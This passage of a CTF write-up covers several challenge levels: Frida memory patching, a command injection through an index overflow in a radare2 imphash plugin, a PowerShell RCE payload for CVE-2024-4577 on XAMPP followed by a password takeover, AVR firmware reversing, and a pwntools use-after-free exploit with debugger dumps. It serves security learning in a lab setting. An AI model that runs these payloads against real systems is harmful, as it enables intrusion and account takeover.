        // Memory.writeByteArray(ptr(base + 0x3AB0), file)
        Memory.writeByteArray(ptr(base + 0x5AB0), file)
 
        // patch hahaha function to set eax to 1
        // mov eax, 1; nop
        Memory.writeByteArray(ptr(base + 0x3454), [0xb8, 0x01, 0x00, 0x00, 0x00, 0x90])
 
        // mov eax, 0; nop
        Memory.writeByteArray(ptr(base + 0x35f1), [0xb8, 0x01, 0x00, 0x00, 0x00, 0x90])
 
        // mov     [rbp+var_24], 0x10
        Memory.writeByteArray(ptr(base + 0x3614), [0x10])
    }
    this.i.call(this, tag, msg)
    return 0
}

After that, we pass all the checks, it spits out the key and IV, and we can put it in the app to get the flag:

Imphash (Level 09)

In this challenge, PALINDROME is using a radare2 plugin to output a hash of all the imports of a binary (this is a common malware analysis technique). It takes in a Portable Executable (PE) file and parses the imports to generate a hash. This site was really useful to learn about how the PE format encodes the import tables. Basically, there are 3 tables involved - a table of library entries, a table of library names, and a table of function entries. The library entry table is the main table that is parsed by radare2 to determine the PE’s imports. This table has several fields, including OriginalFirstThunk and Name. OriginalFirstThunk points to the start of a null-terminated table of function entries, where each entry is a pointer to the name of the function (there’s another value before the name of the function that isn’t important for our exploit). The Name field simply points to the address of the library name. Note, however, that these addresses are RVA addresses - their physical addresses which we can see in a hex editor are not the same as the value we should be putting in, but offset by a certain amount. I compiled a test PE file with a few imports to determine the fixed offset, and from there added the offset to each of my desired entries.

I attempted to use the python lief library to generate a PE file with arbitrary imports, but it wasn’t working very well. There was also a C# library that could do the same but I was too lazy to setup a C# environment just for the challenge. In the end, I manually crafted my exploit using HxD, so I won’t have an exploit script for this challenge, just an overview of what I did during the CTF.

Taking a look in IDA, we can see how this plugin works - it appends all the imports and library names into a really long string, then hashes the entire string to get a unique hash for the set of imported functions. However, we can see that the index which keeps track of the end of the string during the appending process might possibly overflow here:

if ( 4094LL - idx < (unsigned __int64)(libname_without_extension_len + name_len) ) // can possibly overflow
{
    puts("Imports too long!");
    return 1LL;
}
for ( j = 0; j < libname_without_extension_len; ++j )
    formatted_name_to_hash[idx + j] = tolower(also_libname[j]);
formatted_name_to_hash[idx++] = '.';
for ( k = 0; k < name_len; ++k )
    formatted_name_to_hash[idx + k] = tolower(also_name[k]);
idx += name_len;                        // +1056
formatted_name_to_hash[idx++] = ',';

Even though the remaining space left on the string is checked against the total length of the library name and function name, the actual number of characters appended is 2 more than the value specified, one for the dot and one for the comma. So, if the total length of index + library_name + function_name is less than 4094, but the actual total length is 4096, then we can overflow the index and do a array out of bounds. With this out of bounds, we can immediately modify name_len and libname_without_extension_len, which are used to change the value of idx. Hence, we can almost arbitrarily control idx now.

char formatted_name_to_hash[4110]; // [rsp+182h] [rbp-109Eh] BYREF
int name_len; // [rsp+1190h] [rbp-90h]
int libname_without_extension_len; // [rsp+1194h] [rbp-8Ch]

The maximum lengths of the function name and library name are both 255 bytes, since radare2 truncates the remaining string. We can easily circumvent this by doing manual calculations on how many such entries we need to approach the overflow value, and once we’re near enough, using a smaller entry to get the index to point outside the array.

In the appending code above, we can see that libname gets appended first before function name is appended. So, we can use libname to OOB into name_len, and then subsequently, when the program reads name_len, we can use name to control the value of idx to point to wherever we want.

After controlling idx, where should we point it to? If we scroll up to the beginning of the function, we can see this happening:

strcpy(echo, "echo ");
strcpy(out, " > out");

So the command that generates the import hash is actually a radare2 command that is hardcoded into the binary, but placed on the stack.

During exploitation I faced an issue with encoding (0xff would be encoded to 0xc0ff in UTF-8), so my index ended up pointing somewhere else. I verified this by launching radare in GDB so I could see the exact value of the index after the overwrite.

I was too lazy to fix this properly, so after overwriting index, I just added enough entries to increment index back to the desired value. Even though it probably overwrote something important higher up in the stack it doesn’t matter once we manage to replace echo with our desired flag command:

echo                                 ;  cp /app/flag.txt out;

The whitespace is so our hash doesn’t interfere with the payload. After parsing this file, remote returns us the flag:

Diffuse (Level 10)

We’ve gained access to PALINDROME’s bomb expert’s computer. Time is of the essence - we need to defuse it quickly! PALINDROME too knows this, and decided to place a million red herrings all around the system to delay us as long as possible, and either keep us guessing forever or frustrate us enough so we give up. This challenge was the most painful and guessy challenge in the CTF. I didn’t enjoy this challenge very much at all, especially given the last part is quite intense RE which I already dislike on its own - and not to mention the first few parts are full of guessing and randomly stumbling upon crucial pieces of the challenge well-hidden throughout the Windows computer.

We start off in a Windows SSH machine as diffuser , with a lot of strange pictures left around in the desktop for no reason. There’s also a diffuse user which we don’t have access to. After trying some commands, we might realize that there’s a web server running on the machine on port 80. We can curl this server and observe that it seems to be running XAMPP v8.1.25, which a quick Google search will show that it’s vulnerable to https://github.com/AlperenY-cs/CVE-2024-4577. We can trigger this RCE exploit in Powershell as such:

irm -Method post \
    -ContentType "application/x-www-form-urlencoded" \
    -Body '<?php echo system("dir"); die(); ?>' \
    "http://localhost/submit.php?%ADd+allow_url_include%3d1+%ADd+auto_%70%72%65%70%65%6e%64_file%3dphp://input"

Once we have RCE, we can use it to run commands as the XAMPP user. The XAMPP user seems to have all admin privileges, so we can change the password of the diffuse user and SSH as that user instead. In this new desktop, we find a few interesting files, particularly the firmware for a certain bomb device.

Reversing this firmware was really quite a pain. It uses the XTENSA architecture, which IDA doesn’t have decompilation support for, and Ghidra’s decomp for it was quite bad. In fact, for this challenge, I found dynamic reversing a lot more useful than static, but we’ll visit that later. First, we need to figure out how to actually run the firmware by simulating the device.

In the user’s desktop, there are also some photos of the bomb device, including the Arduino board used to run the firmware. We can see from the board that the processor is atmega328p, and we can download an IDA configuration for this processor type from here.

Annoyingly, the schematic for the bomb was hidden in another folder in AppData/Roaming, and I only found the schematic.pdf file after looking through almost literally everything, and stumbling on the backup history for Notepad++, which the challenge author probably used to setup the original instance. There I saw the setup.ps1 file which points me to the schematic.pdf file.

Because I didn’t have the schematic initially, I tried using a variety of simulation software, such as simavr and AVR Simulator, all to no avail. Why? Because my assumptions about how the bomb worked, based on the fake (and completely useless) image of the bomb provided in the folder, were wrong. I even tried to replicate the wiring of the bomb using eye power on the image, but nothing was showing up on the simulated LCD. Frustrated, I decided to take a break and wait for Gerrard to solve the challenge first, while I went to do my ever-growing pile of long-overdue schoolwork.

After Gerrard (flyyee) solved this challenge, I came back to take another look at the Windows VM provided, and finally found the schematic.pdf file. This schematic was worlds apart from the provided image:

1. The LCD display was completely different - in the image, it was a Hitachi HD44780 LCD, the most common LCD display on the market. However, the schematic suggested the LCD used was wokwi-lcd1602-i2c - not only is the LCD chip different (PCF8574T rather than HD44780), the protocol used is also different (I2C instead of standard).
2. The image showed that the bomb had 2 input buttons - but in the schematic, the bomb is connected to a keypad instead.
3. The image didn’t have the 7segment component, while the schematic had it.

Not only that, the PDF had a hidden page - on the second page was the secret key which we were meant to embed in the chip. The only hint towards this was the “Page 1 of 2” on the bottom of the PDF - such a small hint for a crucial detail.

After solving the challenge, I realized that the A0/A1 pins also have a small “rng” label on it - apparently this was supposed to inform participants that we were supposed to connect a component here to control a certain RNG value, which we’ll look into later.

Enough ranting - at least this meant I was actually making some progress. As the schematic components were labelled according to their IDs in the Wokwi simulation software, it was really useful for solving the last part of this challenge.

After setting up the wiring of the device as shown in the schematic using the Wokwi VSCode extension, it was finally time to run the bomb firmware. On uploading the firmware and running it, we see some output from the LCD screen. However, entering the bomb code which we found in the firmware - 39AB41D072C - doesn’t defuse the bomb, but complains about a wrong decryption key. This is where the chip in the schematic comes in. Unfortunately, there was no indication as to what we were meant to do with the chip, other than that it should provide the decryption key. To make things worse, the Arduino would send a certain output to the chip to initialize the UART connection and poll to receive characters, which misled me into thinking we were supposed to do something with the received string. The most unlucky of all - the received string, when XORed against the entire decryption key found in the PDF, gives a string comprising of entirely printable characters, which made me think I was on the right track. Unfortunately, I was getting further from the solution.

At the same time, I started doing some dynamic analysis on the firmware. The XTENSA architecture was quite interesting - it had 32 8-bit registers, yet it operated on 16-bit values, so 1 value is usually represented by 2 registers. This is especially true for the X, Y, and Z registers, aliases for r27:r28, r29:r30, and r31:r32 respectively. In addition, the writable regions are stored completely separately from the code region (something called Harvard architecture), so a memory address such as 0x37a can’t be properly resolved in IDA, since it also corresponds to a code address. GDB, which is based on von-Neumann architecture, addresses this issue by offsetting the RAM region by a fixed offset 0x800000, and resolving the references to these addresses accordingly, so we need to add this value to the addresses we see in the disassembly if we wish to view it in GDB.

Through some intense debugging, I soon figured that at some point between inputting the code and printing the error message, certain strings, including my decryption key, were being XORed against a single byte key. By setting this value to 0x00 and then checking the unchanged input strings, I found that the key 0xe8 would actually decrypt the last string to TISC{ - and then the decryption afterwards fails. I spent another painful day tracing this value all the way to its source - an instruction that reads a 16-bit value from the ADC register. This register, apparently, is controlled by the A0/A1 pins on the Arduino, The series of operations performed on the value obtained from this register is quite complex in assembly, but less so in Python, though equally as confusing and arbitrary:

def cool_func(val):
    value = val
    for i in range(0x20):
        value *= 2
        if value > 0xffffffffff:
            value -= 0xff00000000
    return value
 
for i in range(1023):
 
    val = cool_func(i) >> 32
    val = cool_func(val * 0x41a7) >> 32
 
    if val == 0xe8:
        print(i, hex(val))

This script will generate some possible values of the ADC register that will result in a decryption key of 0xe8. After running this script, we notice a few values like 1, 256 etc will work, so I connected a power source to the A0 pin and set its value to 1.

Following this, I tried a few combinations of output from the chip with the secret key - sending back the string we received, XORing each respective byte of the received string and the secret key, and finally sending just the secret key, completely ignoring the bytes that the chip receives

• which surprisingly worked, meaning the received bytes were just useless red herrings as well. The LCD then tells us that the flag is found in the I2C bus. Looking at where I first saw the flag format, I realized the flag was no longer there. At this point, it was 3am and I was really tired of this challenge, so I just searched through memory for the flag format and found the flag at 0x80034d.

Sandboxed Notes App (Level 11)

Finally we’re past that annoying guessy challenge. PALINDROME wants to reward us for enduring that mess, and so, the next step to stop PALINDROME is a standard note-storing app that of course is vulnerable to UAF. However, to spice things up, PALINDROME is using a Microsoft-developed sandbox to keep us from escaping - surely this is too secure for us to break through?

We’re given quite a few binaries:

1. chall, the parent which we interact with and is responsible for creating the sandboxed process
2. sandboxed-lib, the user-defined library that defines functions for the
3. library_runner, the binary that runs in sandboxed mode parent process to call in sandbox context
4. libsandbox.so, the sandbox library code itself

This is the main process that we interact with:

void sandboxed_session()
{
    ChallSandbox sandbox;
    bool end = false;
    bool result = true;
    while (!end) {
        menu();
        switch (get_option()) {
            case 1:
                result = sandbox.new_note();
                break;
            case 2:
                result = sandbox.free_note();
                break;
            case 3:
                result = sandbox.edit_note();
                break;
            case 4:
                result = sandbox.view_note();
                break;
            case 5:
                result = get_feedback();
                break;
            case 6:
                result = view_feedback();
                break;
            default:
                puts("Invalid input, exiting...");
                end = true;
                break;
        }
        if (!end) {
            if (result) { printf("Operation success.\n"); }
            else { printf("Operation failed.\n"); }
        }
    }
    // no more references to sandbox; garbage collector will destroy it
    // here sandbox will be destroyed
}

The functions called from sandbox will run under the sandbox context, while the others will run as per normal in the parent process. The way the context is sandboxed is simple yet quite effective - by spawning a separate process for the child sandbox, it effectively can’t affect the parent in any way. But that would be quite useless, so a select few memory regions are shared between parent and child so that they can still communicate. The regions have different permissions for parent and child based on the needs of the sandbox library. Besides these regions, all other memory regions are private to either parent or child.

By the way, to debug this challenge and run it locally was slightly difficult. Because of the host of libraries required for the sandbox library, I was performing local debugging at first without linking the libraries properly. This led to a few discrepancies in leaks within the exploit, so for the final exploit I had to debug directly in docker and tweak the leaked values slightly. As of writing this writeup, I’ve migrated my entire setup into the container - neovim, pwntools, pwndbg and zellij - and simply treated the container as my host environment. I think this is the easiest way to go about debugging the exploit without trying to link all the libraries properly.

Let’s look at how the allocator works in the sandbox.

pwndbg> tel 0x7f47c0010aa0
00:0000│  0x7f47c0010aa0 ◂— 0x20 /* ' ' */
01:0008│  0x7f47c0010aa8 —▸ 0x7ef448e6a8c3 (print_note(note*)) ◂— endbr64
02:0010│  0x7f47c0010ab0 —▸ 0x7f47c0010ac0 —▸ 0x7f47c0010aa0 ◂— 0x20 /* ' ' */
03:0018│  0x7f47c0010ab8 ◂— 0
04:0020│  0x7f47c0010ac0 —▸ 0x7f47c0010aa0 ◂— 0x20 /* ' ' */
05:0028│  0x7f47c0010ac8 ◂— 0xa646c72 /* 'rld\n' */
06:0030│  0x7f47c0010ad0 ◂— 0
07:0038│  0x7f47c0010ad8 ◂— 0

static bool free_note() {
  unsigned int idx = 0;
  bool ok = get_idx(&idx);
  if (!ok) { return false; }
  if (notes[idx] == NULL) { return false; }
  else {
    free(notes[idx]->contents);
    free(notes[idx]);
  }
  return true;
}

struct note {
  size_t size;
  void* (*printfn)(struct note *);
  char *contents;
};

# prepare uaf
add_note(0, 0x20, b"\x00")
free_note(0)
 
# shift alloc by 1
add_note(2, 0x100, b"\x00")
 
# cycle through freed objects
for i in range(255):
    add_note(3, 0x20, p64(i))
 
# use uaf to edit size
payload = flat(
    0x100,
)
edit_note(3, payload)

pwndbg> tel &notes
00:0000│  0x7f093d51f5e0 (notes) —▸ 0x7efc40010aa0 ◂— 0x100
01:0008│  0x7f093d51f5e8 (notes+8) ◂— 0
02:0010│  0x7f093d51f5f0 (notes+16) —▸ 0x7efc40010ae0 ◂— 0x100
03:0018│  0x7f093d51f5f8 (notes+24) —▸ 0x7efc40010ac0 ◂— 0x20 /* ' ' */
04:0020│  0x7f093d51f600 (notes+32) ◂— 0
... ↓     3 skipped
pwndbg> tel 0x7efc40010ac0
00:0000│  0x7efc40010ac0 ◂— 0x20 /* ' ' */
01:0008│  0x7efc40010ac8 —▸ 0x7f093d5168c3 (print_note(note*)) ◂— endbr64
02:0010│  0x7efc40010ad0 —▸ 0x7efc40010aa0 ◂— 0x100
03:0018│  0x7efc40010ad8 ◂— 0
04:0020│  0x7efc40010ae0 ◂— 0x100
05:0028│  0x7efc40010ae8 —▸ 0x7f093d5168c3 (print_note(note*)) ◂— endbr64
06:0030│  0x7efc40010af0 —▸ 0x7efc4005c200 —▸ 0x7efc4005c300 —▸ 0x7efc4005c400 —▸ 0x7efc4005c500 ◂— ...
07:0038│  0x7efc40010af8 ◂— 0

pwndbg> x/32gx 0x7efc40010aa0
0x7efc40010aa0: 0x0000000000000100      0x00007f093d5168c3
0x7efc40010ab0: 0x00007efc40010ac0      0x0000000000000000
0x7efc40010ac0: 0x0000000000000020      0x00007f093d5168c3
0x7efc40010ad0: 0x00007efc40010aa0      0x0000000000000000
0x7efc40010ae0: 0x0000000000000100      0x00007f093d5168c3
0x7efc40010af0: 0x00007efc4005c200      0x0000000000000000
0x7efc40010b00: 0x0000000000000020      0x00007f093d5168c3
0x7efc40010b10: 0x00007efc40010b20      0x0000000000000000
0x7efc40010b20: 0x0000000000000000      0x0000000000000000
0x7efc40010b30: 0x0000000000000000      0x0000000000000000
0x7efc40010b40: 0x0000000000000020      0x00007f093d5168c3
0x7efc40010b50: 0x00007efc40010b60      0x0000000000000000
0x7efc40010b60: 0x0000000000000001      0x0000000000000000
0x7efc40010b70: 0x0000000000000000      0x0000000000000000
0x7efc40010b80: 0x0000000000000020      0x00007f093d5168c3
0x7efc40010b90: 0x00007efc40010ba0      0x0000000000000000

57:02b8│  0x7f093d51f2b8 (__gnu_cxx::new_allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >::_M_max_size() const@got.plt) —▸ 0x7f093d518482 (__gnu_cxx::new_allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >::_M_max_size() const) ◂— endbr64
58:02c0│  0x7f093d51f2c0 (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_M_get_Tp_allocator() const@got.plt) —▸ 0x7f093d518470 (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_M_get_Tp_allocator() const) ◂— endbr64
59:02c8│  0x7f093d51f2c8 (void std::_Destroy<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >(std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&)@got.plt) —▸ 0x7f093d515590 ◂— endbr64
5a:02d0│  0x7f093d51f2d0 (std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >::_Tuple_impl(std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >&&)@got.plt) —▸ 0x7f093d518a4a (std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >::_Tuple_impl(std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >&&)) ◂— endbr64
5b:02d8│  0x7f093d51f2d8 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::size() const@got.plt) —▸ 0x7f093d517532 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::size() const) ◂— endbr64
5c:02e0│  0x7f093d51f2e0 (operator new(unsigned long)@got.plt) —▸ 0x7f093d90d970 (operator new(unsigned long)) ◂— endbr64
5d:02e8│  0x7f093d51f2e8 (void std::allocator_traits<std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::construct<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >(std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >&&)@got.plt) —▸ 0x7f093d5188de (void std::allocator_traits<std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::construct<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >(std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >&&)) ◂— endbr64
5e:02f0│  0x7f093d51f2f0 (operator delete(void*, unsigned long)@got.plt) —▸ 0x7f093d90bc20 (operator delete(void*, unsigned long)) ◂— endbr64
5f:02f8│  0x7f093d51f2f8 (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_Vector_impl_data::_Vector_impl_data()@got.plt) —▸ 0x7f093d517440 (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_Vector_impl_data::_Vector_impl_data()) ◂— endbr64
60:0300│  0x7f093d51f300 (sendRequest(sandbox::HostServiceRequest)@got.plt) —▸ 0x7f093d515600 ◂— endbr64
61:0308│  0x7f093d51f308 (std::__uniq_ptr_impl<sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD>, std::default_delete<sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD> > >::_M_deleter()@got.plt) —▸ 0x7f093d515610 ◂— endbr64
62:0310│  0x7f093d51f310 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::back()@got.plt) —▸ 0x7f093d517b62 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::back()) ◂— endbr64
63:0318│  0x7f093d51f318 (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_M_get_Tp_allocator()@got.plt) —▸ 0x7f093d5180ce (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_M_get_Tp_allocator()) ◂— endbr64
64:0320│  0x7f093d51f320 (std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >::operator*() const@got.plt) —▸ 0x7f093d517228 (std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >::operator*() const) ◂— endbr64
65:0328│  0x7f093d51f328 (void sandbox::ExportedLibrary::export_function<bool>(bool (*)())@got.plt) —▸ 0x7f093d5172a8 (void sandbox::ExportedLibrary::export_function<bool>(bool (*)())) ◂— endbr64
66:0330│  0x7f093d51f330 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_S_max_size(std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > const&)@got.plt) —▸ 0x7f093d518407 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_S_max_size(std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > const&)) ◂— endbr64
67:0338│  0x7f093d51f338 (std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >::~unique_ptr()@got.plt) —▸ 0x7f093d518566 (std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >::~unique_ptr()) ◂— endbr64
68:0340│  0x7f093d51f340 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_S_relocate(std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&)@got.plt) —▸ 0x7f093d518085 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::_S_relocate(std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&)) ◂— endbr64
69:0348│  0x7f093d51f348 (sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD>::~SharedMemoryMapPOSIX()@got.plt) —▸ 0x7f093d515690 ◂— endbr64
6a:0350│  0x7f093d51f350 (decltype(auto) std::__apply_impl<char* (*&)(int), std::tuple<int>&, 0ul>(char* (*&)(int), std::tuple<int>&, std::integer_sequence<unsigned long, 0ul>)@got.plt) —▸ 0x7f093d518c0f (decltype(auto) std::__apply_impl<char* (*&)(int), std::tuple<int>&, 0ul>(char* (*&)(int), std::tuple<int>&, std::integer_sequence<unsigned long, 0ul>)) ◂— endbr64
6b:0358│  0x7f093d51f358 (__stack_chk_fail@got.plt) —▸ 0x7f093d5156b0 ◂— endbr64
6c:0360│  0x7f093d51f360 (sandbox::ExportedFunctionBase::~ExportedFunctionBase()@got.plt) —▸ 0x7f093d5156c0 ◂— endbr64
6d:0368│  0x7f093d51f368 (std::tuple_element<0ul, std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> > >::type& std::get<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >(std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >&)@got.plt) —▸ 0x7f093d5187bd (std::tuple_element<0ul, std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> > >::type& std::get<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >(std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >&)) ◂— endbr64
6e:0370│  0x7f093d51f370 (__isoc99_scanf@got.plt) —▸ 0x7f093d678090 (__isoc99_scanf) ◂— endbr64
6f:0378│  0x7f093d51f378 (free@got[plt]) —▸ 0x560c27bc5bae (free) ◂— endbr64
70:0380│  0x7f093d51f380 (std::tuple_element<0ul, std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> > >::type const& std::get<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >(std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> > const&)@got.plt) —▸ 0x7f093d517c39 (std::tuple_element<0ul, std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> > >::type const& std::get<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >(std::tuple<sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> > const&)) ◂— endbr64
71:0388│  0x7f093d51f388 (char* (*&std::forward<char* (*&)(int)>(std::remove_reference<char* (*&)(int)>::type&))(int)@got.plt) —▸ 0x7f093d518e80 (char* (*&std::forward<char* (*&)(int)>(std::remove_reference<char* (*&)(int)>::type&))(int)) ◂— endbr64
72:0390│  0x7f093d51f390 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::begin()@got.plt) —▸ 0x7f093d517fbe (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::begin()) ◂— endbr64
73:0398│  0x7f093d51f398 (std::_Head_base<0ul, sandbox::ExportedFunctionBase*, false>::_M_head(std::_Head_base<0ul, sandbox::ExportedFunctionBase*, false> const&)@got.plt) —▸ 0x7f093d51860b (std::_Head_base<0ul, sandbox::ExportedFunctionBase*, false>::_M_head(std::_Head_base<0ul, sandbox::ExportedFunctionBase*, false> const&)) ◂— endbr64
74:03a0│  0x7f093d51f3a0 (std::_Vector_base<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::~_Vector_base()@got.plt) —▸ 0x7f093d515740 ◂— endbr64
75:03a8│  0x7f093d51f3a8 (sandbox::ExportedFunctionBase*& std::__get_helper<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >(std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >&)@got.plt) —▸ 0x7f093d5188ae (sandbox::ExportedFunctionBase*& std::__get_helper<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >(std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >&)) ◂— endbr64
